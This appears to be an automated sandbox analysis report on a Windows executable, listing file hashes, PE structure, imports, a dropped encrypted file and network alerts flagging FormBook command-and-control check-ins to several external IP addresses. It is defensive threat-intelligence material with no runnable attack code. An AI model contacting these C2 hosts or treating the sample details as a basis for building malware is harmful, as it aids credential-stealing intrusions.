Preview: z..H[TXZ01SP..DL.XTXZ41S.57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ.1SP;(.BH.].{.0...c,%;x$*5SC2=.T%"&7 x8Q.!%[.-"h...zY^75.:IFlXTXZ41S)4>.q(?.e:S.n0R.^..n8=.+....$+.B...Q4.g^'$u83.Z41SP57D..XT.[51<t.hDLHXTXZ4.SR4<EGHX.\Z41SP57DL.LTXZ$1SPE3DLH.TXJ41SR57BLHXTXZ47SP57DLHX$\Z43SP57DLJX..Z4!SP%7DLHHTXJ41SP57TLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLf,1 .41S.a3DLXXTX.01S@57DLHXTXZ41SP5.DL(XTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP
Process: C:\Users\user\Desktop\VSP469620.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.993425754498643
Encrypted: true
SSDEEP: 6144:f7a5+JbCu/g0r6xNH9eFGJ8sxyONXXO5S4VBGWPqZkfqPTCCu:f258Ou/gO0J9eg/BXniwWPbqLCJ
MD5: 273F9AF6EA744FC3D3F6A5457A7403F6
SHA1: 1CAF849FB6707A28B08B0E567B4453322AAF3987
SHA-256: 68336F1C58CC864332FEFD6B55C7CB8D797BEBCE9E491B2E15441434A125F30C
SHA-512: 191AE1E45FD022D962F919A9B7938AB64A7E41C6B5B5648F12429376AA2AA0C4F942161D52D2D9BCB2B4FBE0E6D4179C35B733E7763AD56EF1626F0575C85CEE
Malicious: false
Preview: z..H[TXZ01SP..DL.XTXZ41S.57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ.1SP;(.BH.].{.0...c,%;x$*5SC2=.T%"&7 x8Q.!%[.-"h...zY^75.:IFlXTXZ41S)4>.q(?.e:S.n0R.^..n8=.+....$+.B...Q4.g^'$u83.Z41SP57D..XT.[51<t.hDLHXTXZ4.SR4<EGHX.\Z41SP57DL.LTXZ$1SPE3DLH.TXJ41SR57BLHXTXZ47SP57DLHX$\Z43SP57DLJX..Z4!SP%7DLHHTXJ41SP57TLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLf,1 .41S.a3DLXXTX.01S@57DLHXTXZ41SP5.DL(XTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP57DLHXTXZ41SP
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.140735037435853
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: VSP469620.exe
File size: 1'207'808 bytes
MD5: e4cb2ac542d27b0c73c5a290bf5ffe77
SHA1: 0340de260b7364564c4c3480b0489d4edf431a3e
SHA256: 9060815773bcc67db557cd691aeb3c74d471008e7c9388d13c7b03468b11dcfe
SHA512: bd1899f9b7cd635cae29dce079a07580d4b77a3de44a36a1e911bc7aabd7f957d7261a26df68495ce9b8a8f439b06f04de4f4d008ef97df831abbe6018c668a0
SSDEEP: 24576:Wtb20pkaCqT5TBWgNQ7a98yboib3Me3lJa/6A:DVg5tQ7a980Db8eVC5
TLSH: 5845CF1363DEC361C3B25273BA657701AEBF782506B1F96B2FD8093DF820162525E663
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F1312 [Thu Nov 21 11:01:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Instruction
call 00007FFB144D817Fh
jmp 00007FFB144CB194h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FFB144CB31Ah
cmp edi, eax
jc 00007FFB144CB67Eh
bt dword ptr [004C0158h], 01h
jnc 00007FFB144CB319h
rep movsb
jmp 00007FFB144CB62Ch
cmp ecx, 00000080h
jc 00007FFB144CB4E4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FFB144CB320h
bt dword ptr [004BA370h], 01h
jc 00007FFB144CB7F0h
bt dword ptr [004C0158h], 00000000h
jnc 00007FFB144CB4BDh
test edi, 00000003h
jne 00007FFB144CB4CEh
test esi, 00000003h
jne 00007FFB144CB4ADh
bt edi, 02h
jnc 00007FFB144CB31Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FFB144CB323h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FFB144CB375h
bt esi, 03h
jnc 00007FFB144CB3C8h
movdqa xmm1, dqword ptr [esi+00h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5dd54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5dd54 | 0x5de00 | 0999152663d63b9878785baa32bc078d | False | 0.9302492509986684 | data | 7.899420632109369 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x122000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x55059 | data | | | 1.000333094998119
RT_GROUP_ICON | 0x121814 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x12188c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1218a0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1218b4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1218c8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1219a4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T08:13:48.549892+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49853 | 172.104.82.74 | 80 | TCP
2024-11-24T08:14:09.110171+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49904 | 31.31.196.177 | 80 | TCP
2024-11-24T08:14:24.686321+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49943 | 13.248.169.48 | 80 | TCP
2024-11-24T08:14:39.454457+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49980 | 13.248.169.48 | 80 | TCP
2024-11-24T08:14:55.212395+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49990 | 107.167.84.42 | 80 | TCP
2024-11-24T08:15:10.273169+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49994 | 209.74.77.108 | 80 | TCP
2024-11-24T08:15:24.991140+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49998 | 104.21.44.16 | 80 | TCP
2024-11-24T08:15:39.670779+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 50002 | 13.248.169.48 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 08:13:45.841423035 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:45.960928917 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:45.961076975 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:45.982008934 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:46.101444006 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:48.541435957 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:48.549774885 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:48.549871922 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:48.549891949 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:48.549926043 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:48.553462982 CET | 49853 | 80 | 192.168.2.10 | 172.104.82.74
Nov 24, 2024 08:13:48.672986984 CET | 80 | 49853 | 172.104.82.74 | 192.168.2.10
Nov 24, 2024 08:13:59.646157980 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:13:59.766020060 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:13:59.766254902 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:13:59.781732082 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:13:59.901319027 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.222702980 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.222762108 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.222786903 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.222867966 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.223011017 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223087072 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.223114967 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223134995 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223176003 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.223221064 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223293066 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223310947 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223344088 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.223397017 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.223438978 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.292671919 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.342478991 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.342550993 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.342578888 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.342613935 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.346699953 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.346765041 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:01.346841097 CET | 80 | 49884 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:01.346923113 CET | 49884 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:02.311769962 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:02.432163000 CET | 80 | 49890 | 31.31.196.177 | 192.168.2.10
Nov 24, 2024 08:14:02.432302952 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
Nov 24, 2024 08:14:02.448090076 CET | 49890 | 80 | 192.168.2.10 | 31.31.196.177
